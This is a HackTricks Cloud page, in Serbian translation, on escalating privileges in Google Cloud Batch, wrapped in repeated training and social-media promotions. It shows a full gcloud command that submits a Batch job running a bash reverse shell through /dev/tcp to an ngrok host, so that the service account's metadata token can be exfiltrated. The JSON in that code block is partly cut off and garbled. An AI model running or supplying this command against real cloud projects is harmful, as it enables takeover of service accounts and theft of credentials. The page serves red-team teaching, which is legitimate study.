GCP - Batch Privesc

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Pogledajte subscription plans!

Pridružite se 💬 Discord group or the telegram group or pratite nas na Twitter 🐦 @hacktricks_live.

Podelite hacking tricks slanjem PR-ova na HackTricks i HackTricks Cloud github repos.

Batch

Osnovne informacije:

GCP - Batch Enum

`batch.jobs.create`, `iam.serviceAccounts.actAs`

Moguće je kreirati a batch job, dobiti a reverse shell i exfiltrate the metadata token of the SA (compute SA by default).

Create Batch job with reverse shell

```bash gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n" } } ], "volumes": [] } } ], "allocationPolicy": { "instances": [ { "policy": { "provisioningModel": "STANDARD", "machineType": "e2-micro" } } ] }, "logsPolicy": { "destination": "CLOUD_LOGGING" } } EOD ```

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Pogledajte subscription plans!

Pridružite se 💬 Discord group or the telegram group or pratite nas na Twitter 🐦 @hacktricks_live.

Podelite hacking tricks slanjem PR-ova na HackTricks i HackTricks Cloud github repos.

HackTricks Cloud

GCP - Batch Privesc

Batch

batch.jobs.create, iam.serviceAccounts.actAs

`batch.jobs.create`, `iam.serviceAccounts.actAs`